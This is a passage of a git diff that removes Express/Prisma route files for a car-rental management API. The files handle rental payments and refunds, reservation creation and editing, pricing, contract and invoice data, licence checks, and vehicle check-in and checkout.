z.string() }).parse(req.body) - - const payment = await prisma.rentalPayment.findFirstOrThrow({ - where: { paypalCaptureId: paypalOrderId, companyId: req.companyId }, - }) - - const capture = await paypal.captureOrder(paypalOrderId) as Record - const captureId = capture.purchase_units?.[0]?.payments?.captures?.[0]?.id ?? paypalOrderId - - const updated = await prisma.rentalPayment.update({ - where: { id: payment.id }, - data: { status: 'SUCCEEDED', paidAt: new Date(), paypalCaptureId: captureId }, - }) - - await prisma.reservation.update({ - where: { id: payment.reservationId }, - data: { paymentStatus: 'PAID', paidAmount: { increment: payment.amount } }, - }) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/reservations/:id/manual', requireRole('MANAGER'), async (req, res, next) => { - try { - const { amount, currency, type, paymentMethod } = manualPaymentSchema.parse(req.body) - - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - }) - - const remainingBalance = Math.max(reservation.totalAmount - reservation.paidAmount, 0) - if (remainingBalance <= 0) { - return res.status(409).json({ error: 'already_paid', message: 'Reservation is already fully paid', statusCode: 409 }) - } - if (amount > remainingBalance) { - return res.status(400).json({ error: 'amount_exceeds_balance', message: 'Payment amount exceeds remaining balance', statusCode: 400 }) - } - - const payment = await prisma.rentalPayment.create({ - data: { - companyId: req.companyId, - reservationId: reservation.id, - amount, - currency, - status: 'SUCCEEDED', - type, - paymentProvider: paymentMethod === 'PAYPAL' ? 'PAYPAL' : 'AMANPAY', - paymentMethod, - paidAt: new Date(), - }, - }) - - const newPaidAmount = reservation.paidAmount + amount - const paymentStatus = newPaidAmount >= reservation.totalAmount ? 'PAID' : 'PARTIAL' - - await prisma.reservation.update({ - where: { id: reservation.id }, - data: { - paidAmount: newPaidAmount, - paymentStatus, - }, - }) - - res.json({ data: payment }) - } catch (err) { next(err) } -}) - -router.post('/reservations/:reservationId/payments/:paymentId/refund', requireRole('MANAGER'), async (req, res, next) => { - try { - const { amount, reason } = z.object({ - amount: z.number().int().positive().optional(), - reason: z.string().optional(), - }).parse(req.body) - - const payment = await prisma.rentalPayment.findFirstOrThrow({ - where: { id: req.params.paymentId, companyId: req.companyId, reservationId: req.params.reservationId }, - }) - - if (payment.status !== 'SUCCEEDED') { - return res.status(400).json({ error: 'not_capturable', message: 'Only succeeded payments can be refunded', statusCode: 400 }) - } - if (!payment.amanpayTransactionId && !payment.paypalCaptureId) { - return res.status(400).json({ error: 'manual_refund_unsupported', message: 'Manual payments must be refunded outside the online gateway flow', statusCode: 400 }) - } - - const refundAmount = amount ?? payment.amount - - if (payment.paymentProvider === 'AMANPAY') { - if (!payment.amanpayTransactionId) throw new Error('No AmanPay transaction ID') - await amanpay.refundTransaction(payment.amanpayTransactionId, refundAmount, reason) - } else { - if (!payment.paypalCaptureId) throw new Error('No PayPal capture ID') - await paypal.refundCapture(payment.paypalCaptureId, refundAmount, payment.currency, reason) - } - - const isPartial = refundAmount < payment.amount - const updated = await prisma.rentalPayment.update({ - where: { id: payment.id }, - data: { status: isPartial ? 'PARTIALLY_REFUNDED' : 'REFUNDED' }, - }) - - if (!isPartial) { - await prisma.reservation.update({ - where: { id: payment.reservationId }, - data: { paymentStatus: 'REFUNDED' }, - }) - } - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/reservations.ts b/apps/api/src/routes/reservations.ts deleted file mode 100644 index 52ebcfb..0000000 --- a/apps/api/src/routes/reservations.ts +++ /dev/null @@ -1,1025 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { applyAdditionalDriversToReservation } from '../services/additionalDriverService' -import { applyInsurancesToReservation } from '../services/insuranceService' -import { applyPricingRules } from '../services/pricingRuleService' -import { validateAndFlagLicense, validateLicense } from '../services/licenseValidationService' -import { sendNotification, sendTransactionalEmail } from '../services/notificationService' -import { bookingConfirmedNotif, reviewRequestEmail, type Lang } from '../lib/emailTranslations' -import crypto from 'crypto' - -const router = Router() -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const additionalDriverSchema = z.object({ - firstName: z.string().min(1), - lastName: z.string().min(1), - email: z.string().email().optional(), - phone: z.string().optional(), - driverLicense: z.string().min(1), - licenseExpiry: z.string().datetime().optional(), - licenseIssuedAt: z.string().datetime().optional(), - dateOfBirth: z.string().datetime().optional(), - nationality: z.string().optional(), -}) - -const inspectionSchema = z.object({ - mileage: z.number().int().optional(), - fuelLevel: z.enum(['FULL', 'SEVEN_EIGHTHS', 'THREE_QUARTERS', 'FIVE_EIGHTHS', 'HALF', 'THREE_EIGHTHS', 'QUARTER', 'ONE_EIGHTH', 'EMPTY']), - fuelCharge: z.number().int().min(0).optional(), - generalCondition: z.string().optional(), - employeeNotes: z.string().optional(), - customerAgreed: z.boolean().default(false), - damagePoints: z.array( - z.object({ - viewType: z.enum(['TOP', 'FRONT', 'REAR', 'LEFT', 'RIGHT']), - x: z.number(), - y: z.number(), - damageType: z.enum(['SCRATCH', 'DENT', 'CRACK', 'CHIP', 'MISSING', 'STAIN', 'OTHER']), - severity: z.enum(['MINOR', 'MODERATE', 'MAJOR']).default('MINOR'), - description: z.string().optional(), - isPreExisting: z.boolean().default(false), - }), - ).default([]), -}) - -const createSchema = z.object({ - vehicleId: z.string().cuid(), - customerId: z.string().cuid(), - startDate: z.string().datetime(), - endDate: z.string().datetime(), - pickupLocation: z.string().optional(), - returnLocation: z.string().optional(), - offerId: z.string().cuid().optional(), - promoCodeUsed: z.string().optional(), - depositAmount: z.number().int().min(0).default(0), - paymentMode: z.string().max(50).optional(), - notes: z.string().optional(), - selectedInsurancePolicyIds: z.array(z.string()).default([]), - additionalDrivers: z.array(additionalDriverSchema).default([]), -}) - -const updateSchema = z.object({ - startDate: z.string().datetime().optional(), - endDate: z.string().datetime().optional(), - pickupLocation: z.string().optional().nullable(), - returnLocation: z.string().optional().nullable(), - depositAmount: z.number().int().min(0).optional(), - notes: z.string().optional().nullable(), - paymentMode: z.string().max(50).optional().nullable(), - damageChargeAmount: z.number().int().min(0).optional(), - damageChargeNote: z.string().optional().nullable(), -}) - -function parseReservationExtras(extras: unknown) { - if (!extras || typeof extras !== 'object' || Array.isArray(extras)) return {} as Record - return { ...(extras as Record) } -} - -function normalizeOptionalString(value: string | null | undefined) { - const next = typeof value === 'string' ? value.trim() : value - return next ? next : null -} - -function calculateUpdatedInsuranceCharge( - chargeType: 'PER_DAY' | 'PER_RENTAL' | 'PERCENTAGE_OF_RENTAL', - chargeValue: number, - totalDays: number, - baseRentalAmount: number, -) { - switch (chargeType) { - case 'PER_DAY': - return chargeValue * totalDays - case 'PER_RENTAL': - return chargeValue - case 'PERCENTAGE_OF_RENTAL': - return Math.round(baseRentalAmount * chargeValue / 100) - default: - return 0 - } -} - -function calculateUpdatedAdditionalDriverCharge( - chargeType: 'PER_DAY' | 'FLAT' | 'FREE', - chargeValue: number, - totalDays: number, -) { - switch (chargeType) { - case 'PER_DAY': - return chargeValue * totalDays - case 'FLAT': - return chargeValue - default: - return 0 - } -} - -function buildReservationWorkflow(reservation: { - status: string - contractNumber: string | null - invoiceNumber: string | null - extras: unknown -}) { - const extras = parseReservationExtras(reservation.extras) - const closedAt = typeof extras.reservationClosedAt === 'string' ? extras.reservationClosedAt : null - const closedBy = typeof extras.reservationClosedBy === 'string' ? extras.reservationClosedBy : null - const contractGenerated = Boolean(reservation.contractNumber || reservation.invoiceNumber) - const closed = Boolean(closedAt) - - return { - contractGenerated, - closed, - closedAt, - closedBy, - coreEditable: !closed && !contractGenerated && ['DRAFT', 'CONFIRMED'].includes(reservation.status), - returnEditable: !closed && reservation.status === 'COMPLETED', - checkInInspectionEditable: !closed && ['CONFIRMED', 'ACTIVE'].includes(reservation.status), - checkOutInspectionEditable: !closed && reservation.status === 'COMPLETED', - } -} - -function serializeReservationForDashboard(reservation: T) { - const extras = parseReservationExtras(reservation.extras) - return { - ...reservation, - paymentMode: typeof extras.paymentMode === 'string' ? extras.paymentMode : null, - workflow: buildReservationWorkflow(reservation), - } -} - -function formatDocumentNumber(prefix: string, sequence: number) { - return `${prefix}-${String(sequence).padStart(6, '0')}` -} - -async function ensureReservationDocumentNumbers(companyId: string, reservationId: string) { - return prisma.$transaction(async (tx) => { - const reservation = await tx.reservation.findFirstOrThrow({ - where: { id: reservationId, companyId }, - select: { id: true, contractNumber: true, invoiceNumber: true }, - }) - - if (reservation.contractNumber && reservation.invoiceNumber) return reservation - - const settings = await tx.contractSettings.upsert({ - where: { companyId }, - update: {}, - create: { companyId }, - }) - - const data: { contractNumber?: string; invoiceNumber?: string } = {} - const settingsUpdate: { lastContractSeq?: number; lastInvoiceSeq?: number } = {} - - if (!reservation.contractNumber) { - const nextContractSeq = settings.lastContractSeq + 1 - data.contractNumber = formatDocumentNumber(settings.contractPrefix, nextContractSeq) - settingsUpdate.lastContractSeq = nextContractSeq - } - - if (!reservation.invoiceNumber) { - const nextInvoiceSeq = settings.lastInvoiceSeq + 1 - data.invoiceNumber = formatDocumentNumber(settings.invoicePrefix, nextInvoiceSeq) - settingsUpdate.lastInvoiceSeq = nextInvoiceSeq - } - - if (Object.keys(settingsUpdate).length > 0) { - await tx.contractSettings.update({ - where: { companyId }, - data: settingsUpdate, - }) - } - - return tx.reservation.update({ - where: { id: reservationId }, - data, - select: { id: true, contractNumber: true, invoiceNumber: true }, - }) - }) -} - -function buildReservationInvoiceLineItems(reservation: { - dailyRate: number - totalDays: number - discountAmount: number - depositAmount: number - pricingRulesApplied: Array<{ name?: string; amount?: number; type?: string }> | null - insurances: Array<{ id: string; policyName: string; chargeType: string; chargeValue: number; totalCharge: number }> - additionalDrivers: Array<{ id: string; firstName: string; lastName: string; totalCharge: number }> - vehicle: { year: number; make: string; model: string } -}) { - const baseAmount = reservation.dailyRate * reservation.totalDays - const lineItems = [ - { - description: `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model}`, - qty: reservation.totalDays, - unitPrice: reservation.dailyRate, - total: baseAmount, - category: 'RENTAL', - }, - ...reservation.insurances.map((insurance) => ({ - description: insurance.policyName, - qty: insurance.chargeType === 'PER_DAY' ? reservation.totalDays : 1, - unitPrice: insurance.chargeType === 'PER_DAY' ? insurance.chargeValue : insurance.totalCharge, - total: insurance.totalCharge, - category: 'INSURANCE', - })), - ...reservation.additionalDrivers - .filter((driver) => driver.totalCharge > 0) - .map((driver) => ({ - description: `Additional driver - ${driver.firstName} ${driver.lastName}`, - qty: 1, - unitPrice: driver.totalCharge, - total: driver.totalCharge, - category: 'ADDITIONAL_DRIVER', - })), - ...((reservation.pricingRulesApplied ?? []).map((rule, index) => ({ - description: rule.name?.trim() || `Pricing adjustment ${index + 1}`, - qty: 1, - unitPrice: Number(rule.amount ?? 0), - total: Number(rule.amount ?? 0), - category: 'PRICING_RULE', - }))), - ...(reservation.discountAmount > 0 ? [{ - description: 'Discount', - qty: 1, - unitPrice: -reservation.discountAmount, - total: -reservation.discountAmount, - category: 'DISCOUNT', - }] : []), - ...(reservation.depositAmount > 0 ? [{ - description: 'Security deposit', - qty: 1, - unitPrice: reservation.depositAmount, - total: reservation.depositAmount, - category: 'DEPOSIT', - }] : []), - ] - - return lineItems -} - -async function assertReservationLicenseCompliance(reservationId: string, companyId: string) { - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: reservationId, companyId }, - include: { customer: true, additionalDrivers: true }, - }) - - const customerLicense = validateLicense(reservation.customer.licenseExpiry) - const customerDenied = ['DENIED', 'EXPIRED'].includes(reservation.customer.licenseValidationStatus) - if (customerDenied || customerLicense.status === 'EXPIRED') { - throw Object.assign(new Error('Primary driver license is not valid for this reservation'), { - statusCode: 400, - code: 'invalid_primary_license', - }) - } - - if (customerLicense.requiresApproval && reservation.customer.licenseValidationStatus !== 'APPROVED') { - throw Object.assign(new Error('Primary driver license requires manager approval before this reservation can proceed'), { - statusCode: 400, - code: 'primary_license_requires_approval', - }) - } - - const blockedDriver = reservation.additionalDrivers.find((driver) => { - if (driver.licenseExpired) return true - return driver.requiresApproval && !driver.approvedAt - }) - - if (blockedDriver) { - throw Object.assign(new Error(`Additional driver ${blockedDriver.firstName} ${blockedDriver.lastName} requires approval before this reservation can proceed`), { - statusCode: 400, - code: 'additional_driver_requires_approval', - }) - } -} - -router.get('/', async (req, res, next) => { - try { - const { status, vehicleId, source, startDate, endDate, page = '1', pageSize = '20' } = req.query as Record - const where: any = { companyId: req.companyId } - if (status) where.status = status - if (vehicleId) where.vehicleId = vehicleId - if (source) where.source = source - if (startDate) where.startDate = { gte: new Date(startDate) } - if (endDate) where.endDate = { lte: new Date(endDate) } - - const [reservations, total] = await Promise.all([ - prisma.reservation.findMany({ - where, - include: { vehicle: true, customer: true }, - skip: (parseInt(page) - 1) * parseInt(pageSize), - take: parseInt(pageSize), - orderBy: { createdAt: 'desc' }, - }), - prisma.reservation.count({ where }), - ]) - - res.json({ - data: reservations.map((reservation) => serializeReservationForDashboard(reservation)), - total, - page: parseInt(page), - pageSize: parseInt(pageSize), - totalPages: Math.ceil(total / parseInt(pageSize)), - }) - } catch (err) { next(err) } -}) - -router.post('/', async (req, res, next) => { - try { - const body = createSchema.parse(req.body) - - // Validate vehicle belongs to this company - const vehicle = await prisma.vehicle.findFirstOrThrow({ where: { id: body.vehicleId, companyId: req.companyId } }) - const customer = await prisma.customer.findFirstOrThrow({ where: { id: body.customerId, companyId: req.companyId } }) - - const start = new Date(body.startDate) - const end = new Date(body.endDate) - const totalDays = Math.ceil((end.getTime() - start.getTime()) / (1000 * 60 * 60 * 24)) - - // Check availability - const conflict = await prisma.reservation.findFirst({ - where: { vehicleId: body.vehicleId, status: { in: ['CONFIRMED', 'ACTIVE'] }, startDate: { lt: end }, endDate: { gt: start } }, - }) - if (conflict) return res.status(409).json({ error: 'vehicle_unavailable', message: 'Vehicle is not available for the selected dates', statusCode: 409 }) - - let discountAmount = 0 - let offerId: string | null = body.offerId ?? null - - if (body.promoCodeUsed) { - const offer = await prisma.offer.findFirst({ - where: { companyId: req.companyId, promoCode: body.promoCodeUsed, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, - }) - if (offer) { - offerId = offer.id - const base = vehicle.dailyRate * totalDays - if (offer.type === 'PERCENTAGE') discountAmount = Math.round(base * offer.discountValue / 100) - else if (offer.type === 'FIXED_AMOUNT') discountAmount = offer.discountValue - else if (offer.type === 'FREE_DAY') discountAmount = vehicle.dailyRate * offer.discountValue - await prisma.offer.update({ where: { id: offer.id }, data: { redemptionCount: { increment: 1 } } }) - } - } - - const baseAmount = vehicle.dailyRate * totalDays - const { applied, total: pricingTotal } = await applyPricingRules(req.companyId, body.customerId, body.additionalDrivers as any[], vehicle.dailyRate, totalDays) - const totalAmount = baseAmount - discountAmount + pricingTotal + body.depositAmount - - const reservation = await prisma.reservation.create({ - data: { - companyId: req.companyId, - vehicleId: body.vehicleId, - customerId: body.customerId, - startDate: start, - endDate: end, - pickupLocation: body.pickupLocation ?? null, - returnLocation: body.returnLocation ?? null, - offerId, - promoCodeUsed: body.promoCodeUsed ?? null, - source: 'DASHBOARD', - dailyRate: vehicle.dailyRate, - discountAmount, - totalDays, - totalAmount, - depositAmount: body.depositAmount, - notes: body.notes ?? null, - extras: body.paymentMode ? { paymentMode: body.paymentMode } : undefined, - pricingRulesApplied: applied, - pricingRulesTotal: pricingTotal, - }, - include: { vehicle: true, customer: true }, - }) - - if (body.selectedInsurancePolicyIds.length > 0) { - await applyInsurancesToReservation(reservation.id, req.companyId, body.selectedInsurancePolicyIds, totalDays, baseAmount) - } - - if (body.additionalDrivers.length > 0) { - await applyAdditionalDriversToReservation(reservation.id, req.companyId, body.additionalDrivers, totalDays) - } - - // Validate customer license - await validateAndFlagLicense(body.customerId).catch(() => null) - - res.status(201).json({ data: reservation }) - } catch (err) { next(err) } -}) - -router.get('/:id', async (req, res, next) => { - try { - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { vehicle: true, customer: true, insurances: true, additionalDrivers: true, rentalPayments: true, damageReports: true }, - }) - res.json({ data: serializeReservationForDashboard(reservation) }) - } catch (err) { next(err) } -}) - -router.patch('/:id', async (req, res, next) => { - try { - const body = updateSchema.parse(req.body) - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { - insurances: true, - additionalDrivers: true, - }, - }) - - if (reservation.status === 'CANCELLED' || reservation.status === 'NO_SHOW') { - return res.status(400).json({ error: 'invalid_status', message: 'This reservation can no longer be edited', statusCode: 400 }) - } - - const workflow = buildReservationWorkflow(reservation) - const isReturnEdit = workflow.returnEditable - const requestedFields = Object.keys(body).filter((key) => body[key as keyof typeof body] !== undefined) - const bookingFields = ['startDate', 'endDate', 'pickupLocation', 'returnLocation', 'depositAmount', 'notes', 'paymentMode'] - const returnFields = ['returnLocation', 'damageChargeAmount', 'damageChargeNote'] - - if (!workflow.coreEditable && !isReturnEdit) { - return res.status(400).json({ error: 'reservation_locked', message: 'This reservation is locked for editing', statusCode: 400 }) - } - - if (workflow.coreEditable) { - const invalidFields = requestedFields.filter((field) => !bookingFields.includes(field)) - if (invalidFields.length > 0) { - return res.status(400).json({ error: 'invalid_fields', message: 'Only booking details can be edited at this stage', statusCode: 400 }) - } - - const nextStartDate = body.startDate ? new Date(body.startDate) : reservation.startDate - const nextEndDate = body.endDate ? new Date(body.endDate) : reservation.endDate - const totalDays = Math.ceil((nextEndDate.getTime() - nextStartDate.getTime()) / (1000 * 60 * 60 * 24)) - - if (nextEndDate <= nextStartDate || totalDays <= 0) { - return res.status(400).json({ error: 'invalid_dates', message: 'End date must be after start date', statusCode: 400 }) - } - - if (body.startDate || body.endDate) { - const conflict = await prisma.reservation.findFirst({ - where: { - id: { not: reservation.id }, - vehicleId: reservation.vehicleId, - status: { in: ['DRAFT', 'CONFIRMED', 'ACTIVE'] }, - startDate: { lt: nextEndDate }, - endDate: { gt: nextStartDate }, - }, - }) - - if (conflict) { - return res.status(409).json({ error: 'vehicle_unavailable', message: 'Vehicle is not available for the selected dates', statusCode: 409 }) - } - } - - const baseAmount = reservation.dailyRate * totalDays - const { applied, total: pricingRulesTotal } = await applyPricingRules( - req.companyId, - reservation.customerId, - reservation.additionalDrivers.map((driver) => ({ - dateOfBirth: driver.dateOfBirth, - licenseIssuedAt: driver.licenseIssuedAt, - })), - reservation.dailyRate, - totalDays, - ) - - const insuranceUpdates = reservation.insurances.map((insurance) => ({ - id: insurance.id, - totalCharge: calculateUpdatedInsuranceCharge(insurance.chargeType, insurance.chargeValue, totalDays, baseAmount), - })) - const additionalDriverUpdates = reservation.additionalDrivers.map((driver) => ({ - id: driver.id, - totalCharge: calculateUpdatedAdditionalDriverCharge(driver.chargeType, driver.chargeValue, totalDays), - })) - - const insuranceTotal = insuranceUpdates.reduce((sum, insurance) => sum + insurance.totalCharge, 0) - const additionalDriverTotal = additionalDriverUpdates.reduce((sum, driver) => sum + driver.totalCharge, 0) - const depositAmount = body.depositAmount ?? reservation.depositAmount - const totalAmount = baseAmount - reservation.discountAmount + pricingRulesTotal + insuranceTotal + additionalDriverTotal + depositAmount - - const extras = parseReservationExtras(reservation.extras) - if (body.paymentMode !== undefined) { - const nextPaymentMode = normalizeOptionalString(body.paymentMode) - if (nextPaymentMode) extras.paymentMode = nextPaymentMode - else delete extras.paymentMode - } - - await prisma.$transaction([ - prisma.reservation.update({ - where: { id: reservation.id }, - data: { - startDate: nextStartDate, - endDate: nextEndDate, - totalDays, - pickupLocation: body.pickupLocation !== undefined ? normalizeOptionalString(body.pickupLocation) : reservation.pickupLocation, - returnLocation: body.returnLocation !== undefined ? normalizeOptionalString(body.returnLocation) : reservation.returnLocation, - depositAmount, - notes: body.notes !== undefined ? normalizeOptionalString(body.notes) : reservation.notes, - pricingRulesApplied: applied, - pricingRulesTotal, - insuranceTotal, - additionalDriverTotal, - totalAmount, - extras: (Object.keys(extras).length > 0 ? extras : {}) as any, - }, - }), - ...insuranceUpdates.map((insurance) => - prisma.reservationInsurance.update({ - where: { id: insurance.id }, - data: { totalCharge: insurance.totalCharge }, - }) - ), - ...additionalDriverUpdates.map((driver) => - prisma.additionalDriver.update({ - where: { id: driver.id }, - data: { totalCharge: driver.totalCharge }, - }) - ), - ]) - } else { - const invalidFields = requestedFields.filter((field) => !returnFields.includes(field)) - if (invalidFields.length > 0) { - return res.status(400).json({ error: 'invalid_fields', message: 'Only return details can be edited after vehicle return', statusCode: 400 }) - } - - await prisma.reservation.update({ - where: { id: reservation.id }, - data: { - returnLocation: body.returnLocation !== undefined ? normalizeOptionalString(body.returnLocation) : reservation.returnLocation, - damageChargeAmount: body.damageChargeAmount !== undefined ? body.damageChargeAmount : reservation.damageChargeAmount, - damageChargeNote: body.damageChargeNote !== undefined ? normalizeOptionalString(body.damageChargeNote) : reservation.damageChargeNote, - }, - }) - } - - const updated = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { vehicle: true, customer: true, insurances: true, additionalDrivers: true, rentalPayments: true, damageReports: true }, - }) - - res.json({ data: serializeReservationForDashboard(updated) }) - } catch (err) { next(err) } -}) - -router.get('/:id/contract', async (req, res, next) => { - try { - await ensureReservationDocumentNumbers(req.companyId, req.params.id) - - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { - vehicle: true, - customer: true, - insurances: true, - additionalDrivers: true, - rentalPayments: { orderBy: { createdAt: 'asc' } }, - inspections: { include: { damagePoints: true }, orderBy: { inspectedAt: 'asc' } }, - company: { - include: { - brand: true, - contractSettings: true, - accountingSettings: true, - }, - }, - }, - }) - - const contractSettings = reservation.company.contractSettings ?? await prisma.contractSettings.upsert({ - where: { companyId: req.companyId }, - update: {}, - create: { companyId: req.companyId }, - }) - - const paymentMode = reservation.extras && typeof reservation.extras === 'object' && !Array.isArray(reservation.extras) - ? String((reservation.extras as Record).paymentMode ?? '') - : '' - - const invoiceLineItems = buildReservationInvoiceLineItems({ - dailyRate: reservation.dailyRate, - totalDays: reservation.totalDays, - discountAmount: reservation.discountAmount, - depositAmount: reservation.depositAmount, - pricingRulesApplied: Array.isArray(reservation.pricingRulesApplied) ? reservation.pricingRulesApplied as Array<{ name?: string; amount?: number; type?: string }> : [], - insurances: reservation.insurances, - additionalDrivers: reservation.additionalDrivers, - vehicle: reservation.vehicle, - }) - - const subtotal = invoiceLineItems.reduce((sum, item) => sum + item.total, 0) - const taxes = contractSettings.showTax && contractSettings.taxRate - ? [{ - label: contractSettings.taxLabel?.trim() || 'Tax', - rate: contractSettings.taxRate, - amount: Math.round(subtotal * contractSettings.taxRate / 100), - }] - : [] - const taxTotal = taxes.reduce((sum, tax) => sum + tax.amount, 0) - const grandTotal = subtotal + taxTotal - const amountPaid = reservation.rentalPayments - .filter((payment) => payment.status === 'SUCCEEDED') - .reduce((sum, payment) => sum + payment.amount, 0) - - const checkInInspection = reservation.inspections.find((inspection) => inspection.type === 'CHECKIN') ?? null - const checkOutInspection = reservation.inspections.find((inspection) => inspection.type === 'CHECKOUT') ?? null - - res.json({ - data: { - reservationId: reservation.id, - contractLocale: reservation.company.brand?.defaultLocale ?? 'en', - contractNumber: reservation.contractNumber, - invoiceNumber: reservation.invoiceNumber, - generatedAt: new Date().toISOString(), - status: reservation.status, - paymentStatus: reservation.paymentStatus, - paymentMode: paymentMode || null, - notes: reservation.notes, - company: { - name: reservation.company.brand?.displayName ?? reservation.company.name, - legalName: contractSettings.legalName || reservation.company.name, - email: reservation.company.brand?.publicEmail ?? reservation.company.email, - phone: reservation.company.brand?.publicPhone ?? reservation.company.phone, - address: reservation.company.brand?.publicAddress ?? reservation.company.address ?? null, - city: reservation.company.brand?.publicCity ?? null, - country: reservation.company.brand?.publicCountry ?? null, - registrationNumber: contractSettings.registrationNumber, - taxId: contractSettings.taxId, - logoUrl: reservation.company.brand?.logoUrl ?? null, - }, - driver: { - firstName: reservation.customer.firstName, - lastName: reservation.customer.lastName, - email: reservation.customer.email, - phone: reservation.customer.phone, - dateOfBirth: reservation.customer.dateOfBirth, - driverLicense: reservation.customer.driverLicense, - licenseCountry: reservation.customer.licenseCountry, - licenseCategory: reservation.customer.licenseCategory, - licenseIssuedAt: reservation.customer.licenseIssuedAt, - licenseExpiry: reservation.customer.licenseExpiry, - nationality: reservation.customer.nationality, - }, - additionalDrivers: reservation.additionalDrivers.map((driver) => ({ - id: driver.id, - firstName: driver.firstName, - lastName: driver.lastName, - email: driver.email, - phone: driver.phone, - driverLicense: driver.driverLicense, - licenseIssuedAt: driver.licenseIssuedAt, - licenseExpiry: driver.licenseExpiry, - licenseCountry: driver.nationality, - dateOfBirth: driver.dateOfBirth, - totalCharge: driver.totalCharge, - })), - vehicle: { - make: reservation.vehicle.make, - model: reservation.vehicle.model, - year: reservation.vehicle.year, - color: reservation.vehicle.color, - licensePlate: reservation.vehicle.licensePlate, - vin: reservation.vehicle.vin, - category: reservation.vehicle.category, - }, - rentalPeriod: { - startDate: reservation.startDate, - endDate: reservation.endDate, - totalDays: reservation.totalDays, - pickupLocation: reservation.pickupLocation, - returnLocation: reservation.returnLocation, - }, - insurance: { - total: reservation.insuranceTotal, - policies: reservation.insurances.map((insurance) => ({ - id: insurance.id, - name: insurance.policyName, - chargeType: insurance.chargeType, - unitPrice: insurance.chargeValue, - totalCharge: insurance.totalCharge, - })), - }, - inspections: { - checkIn: checkInInspection, - checkOut: checkOutInspection, - }, - terms: { - terms: contractSettings.terms, - fuelPolicy: contractSettings.fuelPolicy, - fuelPolicyType: contractSettings.fuelPolicyType, - depositPolicy: contractSettings.depositPolicy, - lateFeePolicy: contractSettings.lateFeePolicy, - damagePolicy: contractSettings.damagePolicy, - footerNote: contractSettings.contractFooterNote, - signatureRequired: contractSettings.signatureRequired, - }, - invoice: { - currency: reservation.company.accountingSettings?.currency ?? reservation.company.brand?.defaultCurrency ?? 'MAD', - lineItems: invoiceLineItems, - subtotal, - taxes, - taxTotal, - total: grandTotal, - amountPaid, - balanceDue: grandTotal - amountPaid, - payments: reservation.rentalPayments.map((payment) => ({ - id: payment.id, - amount: payment.amount, - currency: payment.currency, - type: payment.type, - status: payment.status, - provider: payment.paymentProvider, - paymentMethod: payment.paymentMethod, - paidAt: payment.paidAt, - createdAt: payment.createdAt, - })), - }, - }, - }) - } catch (err) { next(err) } -}) - -router.post('/:id/confirm', async (req, res, next) => { - try { - const reservation = await prisma.reservation.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - if (reservation.status !== 'DRAFT') return res.status(400).json({ error: 'invalid_status', message: 'Only DRAFT reservations can be confirmed', statusCode: 400 }) - await assertReservationLicenseCompliance(reservation.id, req.companyId) - - const updated = await prisma.reservation.update({ where: { id: req.params.id }, data: { status: 'CONFIRMED' } }) - - // Notify - const [customer, companyBrand] = await Promise.all([ - prisma.customer.findUniqueOrThrow({ where: { id: reservation.customerId } }), - prisma.brandSettings.findUnique({ where: { companyId: req.companyId }, select: { defaultLocale: true } }), - ]) - const lang = ((companyBrand?.defaultLocale ?? 'fr') as Lang) - await sendNotification({ type: 'BOOKING_CONFIRMED', title: bookingConfirmedNotif.title(lang), body: bookingConfirmedNotif.body(lang), companyId: req.companyId, email: customer.email, channels: ['EMAIL', 'IN_APP'], locale: lang }).catch(() => null) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/:id/checkin', async (req, res, next) => { - try { - const { mileage } = z.object({ mileage: z.number().int().optional() }).parse(req.body) - const reservation = await prisma.reservation.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - if (reservation.status !== 'CONFIRMED') return res.status(400).json({ error: 'invalid_status', message: 'Only CONFIRMED reservations can be checked in', statusCode: 400 }) - await assertReservationLicenseCompliance(reservation.id, req.companyId) - const updated = await prisma.reservation.update({ where: { id: req.params.id }, data: { status: 'ACTIVE', checkedInAt: new Date(), checkInMileage: mileage ?? null } }) - await prisma.vehicle.update({ where: { id: reservation.vehicleId }, data: { status: 'RENTED' } }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/:id/checkout', async (req, res, next) => { - try { - const { mileage } = z.object({ mileage: z.number().int().optional() }).parse(req.body) - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { vehicle: true }, - }) - if (reservation.status !== 'ACTIVE') return res.status(400).json({ error: 'invalid_status', message: 'Only ACTIVE reservations can be checked out', statusCode: 400 }) - - const reviewToken = crypto.randomBytes(32).toString('hex') - const updated = await prisma.reservation.update({ - where: { id: req.params.id }, - data: { status: 'COMPLETED', checkedOutAt: new Date(), checkOutMileage: mileage ?? null, reviewToken }, - }) - await prisma.vehicle.update({ where: { id: reservation.vehicleId }, data: { status: 'AVAILABLE', mileage: mileage ?? undefined } }) - - // Send "How was your rental?" email with secure one-time review link - const customer = await prisma.customer.findUniqueOrThrow({ where: { id: reservation.customerId } }) - const company = await prisma.company.findUnique({ where: { id: req.companyId }, include: { brand: { select: { displayName: true, defaultLocale: true } } } }) - const lang = ((company?.brand?.defaultLocale ?? 'fr') as Lang) - const companyName = company?.brand?.displayName ?? company?.name ?? 'the rental company' - const vehicleLabel = `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model}` - const marketplaceUrl = process.env.MARKETPLACE_URL ?? process.env.NEXT_PUBLIC_MARKETPLACE_URL ?? 'http://localhost:3000' - const reviewUrl = `${marketplaceUrl}/review?token=${reviewToken}` - const reviewOpts = { firstName: customer.firstName, 